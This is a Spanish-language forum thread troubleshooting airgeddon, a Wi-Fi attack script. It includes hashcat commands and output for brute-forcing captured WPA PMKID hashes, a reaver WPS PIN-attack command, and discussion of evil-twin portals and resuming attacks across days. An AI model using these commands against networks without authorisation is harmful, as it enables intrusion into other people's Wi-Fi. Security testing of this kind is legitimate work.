saludos estimado he hecho la tarea e ido probando los diferentes comandos tanto el recomendado por ti como otros que me he fijado de videos y en todos no he tenido exito a continuacion voy a pegar un ejemplo de el comando recomendado por ti en este ejemplo no coloque - m 22000 porque si coloco 22000 y corro el programa me sale es  Initializing backend runtime for device #1...Instrucción ilegal y se para el ataque, en cambio colocando 16800 o 16801 sale es el error de abajo (No hashes loaded.) este problema no se debera a los hashes capturados en el pmkid donde a pesar de decir que capturo el pmkid con exito no es asi, estos pmkid los obtuve con airgeddon en la opcion 5 captura de pmkid . por favor ayudame, que puede ser?


wifislax64 ~ # hashcat -m 16800 -a 3 /root/pmkid-F8:D1:11:89:F9:6E.txt ?a?a?a?a?a?a?a?a  -i --increment-min=2 --increment-max=8 --potfile-disable -o claves.txt  0 -D 1 --force
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.6, Release, LLVM 8.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
========================================================================================================================
* Device #1: pthread-Intel(R) Pentium(R) CPU G2030 @ 3.00GHz, 2807/2871 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashfile '/root/pmkid-F8:D1:11:89:F9:6E.txt' on line 1 (WPA*01...*54502d4c494e4b5f383946393645***): Token length exception
Hashfile '/root/pmkid-F8:D1:11:89:F9:6E.txt' on line 2 (WPA*02...20100000fac040100000fac023c00*82): Token length exception
Hashfile '/root/pmkid-F8:D1:11:89:F9:6E.txt' on line 3 (WPA*02...ad2e039ff9dc20de07aef66d1d9d0*82): Token length exception
No hashes loaded.

Started: Tue Feb  2 22:40:49 2021
Stopped: Tue Feb  2 22:40:50 2021
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 03-02-2021, 08:20 (Miércoles)
No te está detectando bien el tipo de hash PMKID. A ver... estás usando el formato -m 16800 y yo en mi comando te dije que usases -m 22000 .

Antes los pmkid se recogían con un formato, pero desde el cambio de las hcxtools, a partir de la versión v10.31 de airgeddon se cambió para usar el formato nuevo. Así que si tu pmkid fue cogido con versiones viejas tendrás que capturarlo de nuevo, aunque no creo que sea tu problema. Por lo que parece, tu formato es nuevo pero estás intentando usar el comando hashcat viejo (es lo que me parece por lo poco que he podido ver). usa -m 22000 y seguramente te funcionará.

Si consigues que te funcione el hashcat con los comando y en airgeddon no, será que tienes que bajar la última versión de airgeddon... y por última ya no me refiero a la v10.40 que es la última release, sino la v10.41 que está en la rama dev de la que aún no hemos sacado la release... que corrige una validación en la comprobación del formato del hash de pmkid... pero vamos q ese fallito en la v10.40 hace q salga un error en rojo que dice que el formato no es válido... eso que te pasa a ti de que te deja continuar pero que luego parece como q no hace nada... es muy raro. habría q ver un vídeo o pantallazos o similar.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 03-02-2021, 13:46 (Miércoles)
saludos y agradecido por tu respuesta pero te comento que los pmkid los estoy capturando con la version 10.41, y como te comente en el mensaje anterior realice la prueba con el comando -m 22000, 22001 y en ambos me salia  es este mensaje (Initializing backend runtime for device #1...Instrucción ilegal). en cambio usando -m 16800 me sale que no hay hashes incluso probe colocando 0 y tambien me sale que no hay hashes para mi el problema sigue siendo los paquetes capturados, ayudame por favor
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 03-02-2021, 14:00 (Miércoles)
Si los has capturado con la versión v10.41 entonces ya te digo que al 100% tendrás que usar -m 22000 en hashcat

No obstante, lo único que se me ocurre es que me pases por mensaje privado los hashes y yo intente probar a ver... y te paso comandos que me funcionen a mi siempre teniendo en cuenta que usas CPU. No se que más hacer... eso sí, puede que estos días tarde un poco en responder, que ando hasta arriba.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 03-02-2021, 14:20 (Miércoles)
ok te voy a pasar los hashes por correo ya te los envio
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 03-02-2021, 16:11 (Miércoles)
listo ya te envie los hashes al correo, ahorita intente de nuevo con los hashes que te envie y el comando -m22000 y esto es lo que me arrojo de nuevo:

wifislax64 ~ # hashcat -a 3 -D 1  -m 22000 /root/pmkid-F8:D1:11:89:F9:6E.txt ?a?a?a?a?a?a?a?a --force
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.6, Release, LLVM 8.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
========================================================================================================================
* Device #1: pthread-Intel(R) Pentium(R) CPU G2030 @ 3.00GHz, 2807/2871 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 3 digests; 3 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Initializing backend runtime for device #1...Instrucción ilegal
wifislax64 ~ #
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 03-02-2021, 17:10 (Miércoles)
He cogido los hashes que me mandaste por privado, los metí a un txt y lancé el comando igual que el tuyo

Citar
hashcat -a 3 -D 1  -m 22000 /root/pmkid-F8:D1:11:89:F9:6E.txt ?a?a?a?a?a?a?a?a --force

Se puso a Auditar sin problema. Ahora sabemos 100% que no se trata de hashes erroneos o de algún problema en el comando hashcat. Sin duda algo pasa con tu procesador o bien con el driver Opencl que lo gestiona. Así que a reinstalar, o a arrancar desde un live o a googlear que le pasa a tu micro con hashcat... yo imagino que es un tema de OpenCL que puede dar bastante guerra. Prueba en otro linux a ver, aunque sea con un live para quitarte la duda de si tu hardware no vale.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 03-02-2021, 18:01 (Miércoles)
ok, perfecto pero te voy a pedir un gran favor porque no se como buscar un opencl para mi procesador colaborame con eso dime donde puedo bajarlo, lo otro es que me expliques bien como es el tema de live a que te refieres con eso ? sera que cuando dices live es descargar  linux (ubuntu/kali)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-02-2021, 07:54 (Jueves)
Pues la verdad es que con opencl no he tenido que pelearme... porque yo en las distros de linux que uso como parrot o kali, no hay que hacer nada porque viene ya todo listo.

Respecto a arrancar un linux live, pues me refiero a descargar una iso como wifislax, o kali o parrot, q todas tienen versión live, arrancarlas o bien habiéndolas grabado a un dvd o preparando un pendrive de arranque o como sea, y son capaces de arrancar un sistema linux todo en memoria sin tocar tu disco duro, por lo que puedes probar lo que sea luego reinicias y vuelves a tener tu sistema (el que tengas en tu disco duro) tal y como lo tenías ya sea un windows o lo que quiera que tengas. ¿En serio no habías oído nunca lo de los linux live? joer, me parece raro  :P

Pues eso, descárgate alguno, arrancas con él y pruebas...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 04-02-2021, 14:30 (Jueves)
Ok , perfecto,  bueno si había escuchado de Linux Liverpool por supuesto de hecho yo corro wifislax de un pendrive,  voy a descargar linux kali y correrlo desde un pendrive y probar a ver cualquier cosa te aviso  gracias
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 04-02-2021, 14:39 (Jueves)
Estimado  v1s1t0r se me olvidó preguntarte si probaste los hashes que te envié dentro de airgeddon o fuera de airgeddon si la respuesta es que los probaste con hashcat fuera de airgeddon por favor realiza la prueba con hashcat dentro de airgeddon y me avisas si trabaja bien por favor avísame
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-02-2021, 15:31 (Jueves)
Hola, los probé desde fuera de airgeddon. Los acabo de probar desde dentro de airgeddon... todo ok, también funciona y se pone a descifrar sin problema. Eso si, estamos hablando de la v10.41 que es la versión de la rama dev actualmente.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 04-02-2021, 16:00 (Jueves)
Si exactamente desde la 10.41 , perfecto gracias bueno voy a bajar kali linux y probar a ver como me va cualquier cosa te escribo gracias por tenerme paciencia
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-02-2021, 16:04 (Jueves)
Sin duda es algo externo a airgeddon. Yo ahí ya no te puedo ayudar. Buena suerte!

Voy a ver si estos próximos días pasamos la v10.41 a master y hacemos release...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 04-02-2021, 17:04 (Jueves)
Buenísimo,  excelente así lo tendríamos todo acomodado en wifislax, gracias....
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 06-02-2021, 16:12 (Sábado)
Sin duda es algo externo a airgeddon. Yo ahí ya no te puedo ayudar. Buena suerte!

Voy a ver si estos próximos días pasamos la v10.41 a master y hacemos release...

Saludos mi estimado te comento que descargue  el kali linux  corri el airgeddon en el y me dio el mismo error, luego corri el hashcat desde afuera y me dio el error de instruccion de hardware ilegal , ahora si ya comprobe que mi problema es por el procesador me voy a comprar un procesador mejor el detalle es que no se eligir cual modelo me serviria  para correr el hashcat si me puedes ayudar recomendando algun modelo en especifico te lo agradezco, lo otro es que te voy a enviar un correo para que por favor lo leas
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 08-02-2021, 15:41 (Lunes)
Saludos estimado v1s1t0r una consulta es igual de efectiva la herramienta de hashcat a la hora de encontrar la clave utilizando handshake en vez de pmkid?
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 08-02-2021, 15:42 (Lunes)
por lo visto si, es practicamente lo mismo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 08-02-2021, 15:52 (Lunes)
Ok te lo pregunté porque tengo un linksys que a la hora de capturar los pmkid  no lo consigo en todos los intentos la herramienta captura paquetes m1 ,m2 ,m3  ,m4 y al final cuando cierra la pestaña dice que no consiguió nada en cambio el handshake lo consigue rápido
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 08-02-2021, 16:12 (Lunes)
No todos los routers son vulnerables a lo del pmkid, solo algunos y han de tener el roaming 802.11r activado. Lo bueno es que al que se lo puedes cazar se lo cazas incluso sin clientes. No hacen falta clientes legítimos conectados para cazarlo. El handshake sí que necesita clientes legítimos para ser cazado porque es justo escuchar durante la conexión legítima de un cliente... lo bueno es que eso da igual el modelo de router, funciona para todos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 08-02-2021, 16:30 (Lunes)
Perfecto,  gracias ahora lo que a mi me toca es cambiar es mi procesador porque es tan obsoleto que no corre el hashcat,  pero  bueno ese es otro tema gracias por las respuestas
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 12-02-2021, 08:26 (Viernes)
Tú si que eres inventado. Claramente tu tarjeta no soporta VIF. Mírate esto: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/FAQ-&-Troubleshooting

Esta es la lista de tarjetas soportadas: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Cards%20and%20Chipsets
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 03-03-2021, 15:50 (Miércoles)
saludos, v1s1t0r espero estes excelente quisiera saber si es posible que tu incluyas en airgeddon la herramienta krack attack?
espero tu respuesta gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 03-03-2021, 16:50 (Miércoles)
Nunca lo he visto funcionar bien. ¿Tienes un link de la tool? ¿La has probado? ¿Te funciona y has conseguido algo con ella? si todo eso es sí, puedo pensármelo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 03-03-2021, 17:42 (Miércoles)
ah ok en realidad no
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 17-03-2021, 03:23 (Miércoles)
saludos estimado v1s1t0r quisiera saber si existe la posibilidad de salvar las sesiones de reaver o bully en airgeddon y si no se puede en airgeddon si sabes de alguna manera de salvar estas sesiones en wifislax 2.4 64 bit porque no consigo los script para salvar estas sesiones como la trae en otras versiones de wifislax
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Enol321 en 19-03-2021, 14:08 (Viernes)
felicito por el esfuerzo de curro pero....no carga bien no sale en esta version la index/pagina en evil twin tienes que acudir a moviles antiguos en los nuevos no sale ...es el talon de aquiles de estos script la carga de pagina clon con los nuvas moviles y con las acualizaciones de x ej  google no hay manera ahi esta el problema
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 22-03-2021, 12:14 (Lunes)
Hola, hoy ha salido la versión v10.41 de airgeddon

@USUARIONUEVO , no hay cambios en la estructura de ficheros, solo un cambio en las dependencias. Se ha reemplazado dsniff por dnsmasq . Al parecer dsniff es un paquete que no se mantiene desde hace mucho y estaba comenzando a desaparecer en algunas distros como Pentoo. Así que lo cambio a tiempo por otro que puede hacer lo mismo que airgeddon necesita antes de que se lie como pasó con el sslstrip.

@Enol321, no se con que moviles estarás probando tú, pero hace dos versiones creo recordar, se refactorizó el portal cautivo a nivel de css para hacerlo más responsive y que se viera bien en cualquier parte. Se ha probado en pcs, con versiones viejas y nuevas de los navegadores más famosos como Firefox, Chrome o Edge. También en móviles con Android 5, 6, 7, 8, 9 e incluso Android 10 en la que funciona perfectamente, salta automáticamente y también se ve correctamente. Un colaborador también lo probó en los iphone modernos y todo fue ok. Seguramente tengas algún problema en tu lado. Te recomiendo que hagas pruebas.

@phanta78, sí que se guardan las sesiones de reaver y bully y se pueden reutilizar desde airgeddon. No hay que hacer nada pues reaver o bully las guardan por sí solos y cuando se abre la ventana del ataque, si tienes una sesión te pregunta si quieres reutilizarla. La ventana es interactiva desde la versión v10.40 y puedes elegir continuarla o no. También puedes fuera de airgeddon borrar los ficheros de las sesiones para que no te pregunte. En bully se crea una carpeta oculta .bully (nótese el punto) que puedes borrar. Normalmente en /root/.bully , y para reaver se guardan ficheros con extensión .wpc que depende del linux pueden estar en un sitio u otro. En algunos linux como Kali, se guardana en /usr/local/var/lib/reaver/ . Basta con entrar ahí y borrar los ficheros .wpc . No obstante, como indico, no hace falta pues airgeddon pregunta y puedes darle a "n" y así no continua la sesión.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 25-03-2021, 04:34 (Jueves)
estimado v1s1t0r, yo estoy usando wifislax 2.4 64 bit y airgeddon y cuando realizo un ataque con bully o reaver el guarda la sesion si tu cierras ese ataque y lo vuelves abrir al rato sin a pagar la com****dora pero si tu apagas la com****dora y al dia siguiente vuelves atacar la misma red comienza desde cero no continua con la sesion del dia anterior por lo menos a mi no me sucede. y yo por lo menos trato de buscar el archivo que secrea al cerrar la sesion para ver si lo puedo guardar en la carpeta modulo para crear un a persistencia del archivo y no lo ubico en la direccion que supuestamente se  ha creado al cerrar momentaneamente la sesion. 
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 25-03-2021, 04:42 (Jueves)
@v1s1t0r

Recibido , pues mejor ese cambio por que dnsmasq viene de serie en casi todas las distros linux , mientras el otro , normalmente hay que instalarlo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-03-2021, 07:42 (Jueves)
phanta78, el comportamiento de bully y reaver sobre guardar las sesiones es totalmente externo y ajeno a airgeddon. Funciona como yo te he comentado, y a mi siempre me guarda los ficheros que persisten incluso después de reiniciar el ordenador, así que no se como ayudarte porque en mi caso funciona ok y lo he probado en diferentes linux.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 25-03-2021, 14:41 (Jueves)
ok entiendo, ahora bien estimado nesecito que por favor me ayudes como hago para conseguir la herramienta de salvar sesiones reaver y la de bully que traen las otras versiones de wifislax porque he buscado informacion y no la consigo. yo quiero saber como extraer estas herramientas del wifislax 4.12 por ejemplo y meterla en wifislax 2.4 64 bit
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-03-2021, 14:53 (Jueves)
No se si te estoy entendiendo bien... ¿quieres sacar las versiones antiguas de reaver y bully y meterlas en el nuevo wifislax? no se, pero yo creo que las versiones modernas también deberían salvar las sesiones... ¿con qué versiones sí se te salvan y con qué versiones no se te salvan?
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 25-03-2021, 15:00 (Jueves)
lo que sucede es que a mi no se me salvan las sesiones de reaver ni bully en la version de wifislax 64 bit no se me salvan de manera persistente osea no puedo continuar otro dia y como en otras versiones de wifislax traen esta herramientas de salvar sesion que crean un archivo y uno lo coloca en la carpeta de modulo para crear la persistencia del ataque, pues yo quiero hacer lo mismo pero en la version de wfislax de 2.4 64 bit
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 25-03-2021, 15:06 (Jueves)
no se trata de sacar las versiones antiguas de reaver o bully y meterlas en el nuevo wifislax, se trata de sacar la herramienta de salvar sesiones reaver o bully  y meterla en el nuevo wifislax
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-03-2021, 15:15 (Jueves)
herramienta de salvar sesiones??? no creo que exista tal cosa... yo creo que el propio reaver o bully son los que tienen esa funcionalidad en sí mismos. Me parece muy raro que no te funcione en versiones más nuevas de wifislax. Me vas a hacer al final descargarme de nuevo Wifislax y montar una máquina virtual solo para probar esto... pero es que me parece tan raro... no se.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 25-03-2021, 15:20 (Jueves)
bueno a mi no me guarda sesiones de manera persistente y yo uso el wifislax iso en un pendrive
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 25-03-2021, 15:43 (Jueves)
te acabo de enviar un correo con la foto de una version mas antigua de wifislax donde salen las herramientas de guardar sesion de reaver y bully
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-03-2021, 15:46 (Jueves)
vaya... sí que existía ...  ???

(https://i.ibb.co/26s1qDz/2021-03-25-15-44-39-Clipboard.png)

no se... igual USUARIONUEVO puede arrojar algo de luz en esto...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 25-03-2021, 16:04 (Jueves)
si exactamente esas dos herramientas quiero meterlas en la ultima version de wifislax y te pregunte a ti porque eres el unico que te tomas la molestia en contestar y en verdad te agradezco tanta paciencia, yo cree un tema nuevo preguntado por estas herramientas y nadien me ha respondido como las extraigo de una version mas vieja para meterlas en la ultima version
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 25-03-2021, 21:09 (Jueves)
salu2
Código: [Seleccionar]
reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -s (direccion-de-archivo-de-texto-con-ultimo-pin)
ya se te dijo como hacerlo manualmente no necesitas extras para tal tonteria solo fijarse en menu --help
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 25-03-2021, 22:18 (Jueves)
salu2
Código: [Seleccionar]
reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -s (direccion-de-archivo-de-texto-con-ultimo-pin)
ya se te dijo como hacerlo manualmente no necesitas extras para tal tonteria solo fijarse en menu --help

se trata de tener los ficheros en un xzm , para continuarlos cuando se quiera , el comando esta muy bien , pero no te sirve si no recuerdas el ultimo pin o no tienes el fichero,

lo de salvar las sesiones no es mas que un script que copiaba los ficheros .wpc de reaver y los de bully. a un xzm...de manera que aunque lanzes de nuevo el ataque en unos dias en live , te lo detecte y siga por donde estaba.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 26-03-2021, 03:01 (Viernes)
Muchas gracias por sus respuestas y disculpenme pero no se mucho de estos temas y por eso pregunto para aprender de los que saben
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 14-05-2021, 00:38 (Viernes)
salu2
en wifislax 2.4 64 estable he iniciado airgedon conectado y parece que no ¿hay version nueva? ...
no captura pmkid interface wlanmon
no mata networkmanager antes de poner en monitor ...
(https://i.postimg.cc/R0Gkj0pm/instant-nea1.png)

Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 14-05-2021, 12:45 (Viernes)
Hola, vamos por partes... para saber si hay alguna versión más nueva que la tuya, tendría que saber que versión tienes tú. No lo indicas, no te costaba nada. Lo que sí te puedo decir es que la última versión de la rama master de github es la v10.41

En la rama dev tienes una versión v10.42 donde hay un feature nuevo. En esta vuelve a matar network manager por defecto y además para aquellos que no quieran que ocurra hay una opción en el fichero .airgeddonrc donde puedes elegir el comportamiento para que lo mate o no a tu elección (AIRGEDDON_FORCE_NETWORK_MANAGER_KILLING que puede estar en true o false). Este feature aunque aún no está released, se puede usar si descargas la versión de la rama dev de github que es la versión 10.42. Imagino que ya sabes como va: git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon

Respecto a que no capture pmkid, la respuesta es bastante sencilla... no todos los puntos de acceso son vulnerables a la captura de PMKID. Solo aquellos que tengan activado el feature del roaming 802.11r

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 14-05-2021, 16:45 (Viernes)
salu2
Código: [Seleccionar]
wifislax64 ~ # hcxdumptool --help
hcxdumptool 6.1.2  (C) 2020 ZeroBeat                                                                                                                                                                                                                       
usage  : hcxdumptool <options>                                                                                                                                                                                                                             
         press the switch to terminate hcxdumptool                                                                                                                                                                                                         
         hardware modification is necessary, read more:                                                                                                                                                                                                     
         https://github.com/ZerBea/hcxdumptool/tree/master/docs                                                                                                                                                                                             
example: hcxdumptool -i wlp39s0f3u4u5 -o dump.pcapng --enable_status=31                                                                                                                                                                                     
         do not run hcxdumptool on logical (NETLINK) interfaces (monx, wlanxmon)                                                                                                                                                                           
         do not use hcxdumptool in combination with 3rd party tools, which take access to the interface (except: tshark, wireshark, tcpdump)                                                                                                               
                                                                                                                                                                                                                                                           
short options:                                                                                                                                                                                                                                             
-i <interface> : interface (monitor mode will be enabled by hcxdumptool)                                                                                                                                                                                   
                 some Realtek interfaces require NETLINK to set monitor mode                                                                                                                                                                               
                 in this case try iw:                                                                                                                                                                                                                       
                 ip link set <interface> down                                                                                                                                                                                                               
                 iw dev <interface> set type monitor                                                                                                                                                                                                       
                 ip link set <interface> up                                                                                                                                                                                                                 
                 WARNING:                                                                                                                                                                                                                                   
                  hcxdumptool may not work as expected on virtual NETLINK interfaces                                                                                                                                                                       
                  do not report issues related to iw                                                                                                                                                                                                       
                 It is mandatory that chipset and driver support monitor mode and full packet injection!                                                                                                                                                   
                 Running a virtual machine, it is mandatory that the hardware is looped through!

es lo primero que sale al poner --help
a mi me da igual pues se hacerlo manualmente y tengo mis mod ... pero una captura vale mas mil palabras misma red
pero creo que es mejor interface en modo monitor con iw para capturar pmkid solo eso
(https://i.postimg.cc/CMrMpHJ8/instant-nea1.png)


respecto a version la 10.40 que trae wifislax 2.4 64 de serie no actualiza
(https://i.postimg.cc/jqD25FDc/instant-nea2.png)

version ultima si detecta version para descarga
THANKS por el trabajo
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 19-05-2021, 09:30 (Miércoles)
version ultima??? esa cual es??? por favor, pon la versión que tienes, no es tan difícil. De otra forma no te podremos ayudar.

Respecto a lo del pmkid, no se que decirte, a mí me funciona de lujo en los APs vulnerables que he probado y me da exactamente el mismo resultado haciéndolo desde airgeddon que haciéndolo con el comando, pues al final airgeddon lanza un comando por debajo y es lo mismo. Respecto al tema de que si es mejor cambiar el modo de la tarjeta con iw... cuando está en modo monitor, está en modo monitor, no creo que tenga mucha importancia el como lo has hecho.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 19-05-2021, 13:44 (Miércoles)
visitor , han salido versiones nuevas de estas tools, no he notado nada raro , pero solo he comprobado que las detecta instaladas , no se si los comandos habran sufrido algun cambio.


Citar
03 - Actualizado hcxtools-6.1.6 --> 6.2.0
04 - Actualizado hcxkeys-6.0.0 --> 6.2.0
05 - Actualziado hcxdumptool-6.1.6 --> 6.2.0
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 19-05-2021, 13:55 (Miércoles)
Gracias por el aviso. Estoy viendo el changelog. No parece que vaya a afectarnos por suerte.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 21-05-2021, 00:53 (Viernes)
salu2
bueno no se pero ultima version significa en enlace ofrecido que lleva a ultima version estable o dev como ya sabemos con git ....como queramos hacer para tener version eso es logica amigo
como el pantallazo avisando que es mejor no usar wlanmon ... y el code help avisando de ello mismo bien a la vista ...
y las antiguas versiones como usted hace para detectar el comando compatiblle segun version de filter
decir que versiones antiguas ademas
Código: [Seleccionar]

if compare_floats_greater_or_equal "${hcxdumptool_version}" "${minimum_hcxdumptool_filterap_version}"; then
hcxdumptool_filter="--filterlist_ap="
else
hcxdumptool_filter="--filterlist="
fi
Código: [Seleccionar]
if ! hash hcxpcapngtool 2>/dev/null; then
hcxpcaptool -z  "$scan_capture"/pmkid.txt "$scan_capture"/attack.pcap >/dev/null 2>&1
else
hcxpcapngtool -o  "$scan_capture"/pmkid.txt "$scan_capture"/attack.pcap >/dev/null 2>&1
fi
no se pero solo creo que seria mejor nada mas usted manda en sus proyectos  ;D
salu2
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 21-05-2021, 02:32 (Viernes)
hcxpcaptool , esta mas que obsoleto , se habla ya de este tema.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 21-05-2021, 15:17 (Viernes)
salu2
en wifislax 2.0 64

lo cual airgedon verfica version de hcxdumptool si es menor a 6.0.0 para sustituir comando filterlist x filter_ap
   
Código: [Seleccionar]
if compare_floats_greater_or_equal "${hcxdumptool_version}" "${minimum_hcxdumptool_filterap_version}"; then
hcxdumptool_filter="--filterlist_ap="
else
hcxdumptool_filter="--filterlist="
fi
Código: [Seleccionar]
wifislax64 ~ # hcxpcaptool  --help
hcxpcaptool: unrecognized option '--help'
hcxpcaptool 4.2.1 (C) 2018 by ZeroBeat

pero airgedon usa
hcxpcapngtool lo cual nunca hara su cometido en versiones antiguas
hcxpcapngtool -o "${tmpdir}${standardpmkid_filename}" "${tmpdir}pmkid.pcapng" | grep -Eq "PMKID(\(s\))? written" 2> /dev/null

Código: [Seleccionar]
wifislax64 ~ # hcxpcapngtool
bash: hcxpcapngtool: no se encontró la orden

esto pasara si un usuario utiliza una version antigua de hcxdumptool o wifislax 2.0 64 ...

por eso comento con el fin de añadir soporte a viejas versiones
Código: [Seleccionar]
if ! hash hcxpcapngtool 2>/dev/null; then
hcxpcaptool -z  "${tmpdir}${standardpmkid_filename}" "${tmpdir}pmkid.pcapng" | grep -Eq "PMKID(\(s\))? written" 2> /dev/null
else
hcxpcapngtool -o "${tmpdir}${standardpmkid_filename}" "${tmpdir}pmkid.pcapng" | grep -Eq "PMKID(\(s\))? written" 2> /dev/null
fi
se puede ver que tambien cambio hcxpcaptool a hcxpcapngtool ademas de su comando 
ademas del aviso de feo en pantalla de wlanmon
lo dicho con el fin de añadir soporte a viejas versiones de wifislax que usen version antigua de hcxdumptool
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 21-05-2021, 23:04 (Viernes)
Yo sigo sin verlo , a ver si ahora se va a tener que dar soporte a wifislax 1.0 de hace 10 años.

La version 2.4 de wifislax deberia funcionar bien , sin tocarle nada.

Tu post no hay por donde cogerlo , o mientes o no sabes lo que usas , por que la version 2.4 ...........

Citar
wifislax64 ~ # hcxpcapngtool -v
hcxpcapngtool 6.1.2 (C) 2020 ZeroBeat

Si yo mismo no doy soporte a versiones viejas por que los desarolladores de terceros van a hacerlo ?¿

Si ese es tu empeño, es mas facil que tu mismo , te bajes la version de hcxtools que te vaya mejor en la version de wifislax que quieras , y te la instalas que solo es un make make install.



Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 23-05-2021, 02:00 (Domingo)
De do de sale que gable de 2.4
el que miente e invent is a usted
Lee primero y despues diga donde hablo de 2.4
No problem mister good bay
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 23-05-2021, 09:49 (Domingo)
salu2
en wifislax 2.0 64

Pues lo lei mal , usted perdone  ,MR PERFECT.  ;D
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 26-05-2021, 23:03 (Miércoles)
Hola v1s1t0r!!!

Lo primero felicitarte por tu programa, lo he utilizado con mucha asiduidad y excelentes resultados haciendo pruebas con amigos que viven en mi cercania.

Pero en la ultima version que aparece en la nueva Current de Wifislax aparecen unos mensajes cuando se inicia el ataque que jamas habia visto (en Evil Twin) que me señalan que debo poner la tarjeta en modo monitor algo que obviamente ya habia realizado y otro que me indica No Such Device

Vengo de comentarlo en el post sobre la nueva current de Wifislax (pido disculpas si he repetido el mensaje) en cualquier caso si quieres te adjunto una captura de pantalla en mi proximo mensaje.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 26-05-2021, 23:16 (Miércoles)
Hola v1s1t0r!!!

Lo primero felicitarte por tu programa, lo he utilizado con mucha asiduidad y excelentes resultados haciendo pruebas con amigos que viven en mi cercania.

Pero en la ultima version que aparece en la nueva Current de Wifislax aparecen unos mensajes cuando se inicia el ataque que jamas habia visto (en Evil Twin) que me señalan que debo poner la tarjeta en modo monitor algo que obviamente ya habia realizado y otro que me indica No Such Device

Vengo de comentarlo en el post sobre la nueva current de Wifislax (pido disculpas si he repetido el mensaje) en cualquier caso si quieres te adjunto una captura de pantalla en mi proximo mensaje.

Un saludo.

En estos casos , lo mejor es señalar exactamente los pasos que das para intentar reproducir el error , es decir ..

